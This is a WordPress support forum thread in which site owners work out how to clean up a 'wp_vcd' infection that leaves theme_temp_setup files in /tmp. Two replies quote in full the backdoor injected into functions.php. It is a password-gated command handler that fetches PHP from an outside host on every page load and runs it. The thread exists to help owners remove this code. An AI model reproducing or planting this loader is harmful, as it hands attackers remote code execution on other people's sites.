/tmp/theme_temp_setup what is this
-
hi , suddenly my wordpress error Parse error: syntax error, unexpected ‘<‘ in /tmp/theme_temp_setupb1fUKP on line 2
i found lots of files in /tmp with filename theme_temp_setupxxxx
and inside those files contained :
<?php
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″/>
<title>www.verna.cc</title>
<meta name=”viewport” content=”width=device-width” />
</head>
<body>
</body>
</html>am i hacked or ?
i cant find hwo to fix the problem since i dont know where the php files is locate on my vps.
-
ok so i’ve been hacked!
find this in wp-includes with file name class.wp.php <– delete this!next look into your functions.php remove all on top codes, and problem fixed!
dont forget to change password.
You need to start working your way through the resources on this page. I’d also suggest reviewing http://ottopress.com/2009/hacked-wordpress-backdoors/
Anything less will probably result in the hacker walking straight back into your site again.
Additional Resources:
Hardening WordPress
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/encountered the same, file class.wp.php not. functions.php replaced by new but refuses to work
The instruction has approached, many thanks!
@benderoffspring I have the same problem.
Can you explain in detail the solve?@ Uri70663
wp-include with the file name class.wp.php <- remove it!
file was not. reinstalled functions.php from the original theme and everything started
@benderoffspring thanks
Am I missing something obvious or are you still hacked? Someone or something has broken into your server and created a rogue file. You really need to consider looking at the sources Esmi posted.
- This reply was modified 6 years, 5 months ago by Andrew Nevins.
1. Rename your all theme
2. Login your site
3. Active akismet plugin (free)
4. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
5. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
————————————————————————–
<?phpif (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}}
}
}
break;default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}die(“”);
}if ( ! function_exists( ‘theme_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {if($tmpcontent = @file_get_contents(“http://www.spekt.cc/code4.php?i=”.$path))
{function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}extract(theme_temp_setup($tmpcontent));
}
}
}?>
———————————————————————- This reply was modified 6 years, 5 months ago by Andrew Nevins.
@esmi @anevins yes im reviewing the link @esmi gave , thank you!
and also remove all /tmp files with name theme_temp_setup
@uri70663 @benderoffspring has made the point 😀
Hey guys, just an etiquette thing. Please don’t
@
folks who are already in the thread. If they want to subscribe, they will. If they chose not to, then using the@
sends unwanted emails. Thanks…. and back to having so much un-hacking fun!shakiltorj
Thanks, it’s work for me.
you can say what needs to be done to not repeat this type of attack again?
thanks- This reply was modified 6 years, 5 months ago by helloanimation.
Some update
a. Rename your all theme
b. Login your site
c. Active akismet plugin (free)
d. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
e. Go to wp-includes
Delete the following file
1. wp-feed
2. wp-vcd.php
3. class.wp.php
f. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
————————————————————————–
<?phpif (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}}
}
}
break;default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}die(“”);
}if ( ! function_exists( ‘theme_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {if($tmpcontent = @file_get_contents(“http://www.spekt.cc/code4.php?i=”.$path))
{function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}extract(theme_temp_setup($tmpcontent));
}
}
}?>
———————————————————————I was comprimised with this as well.. Thanks for sharing your resolutions!
- The topic ‘/tmp/theme_temp_setup what is this’ is closed to new replies.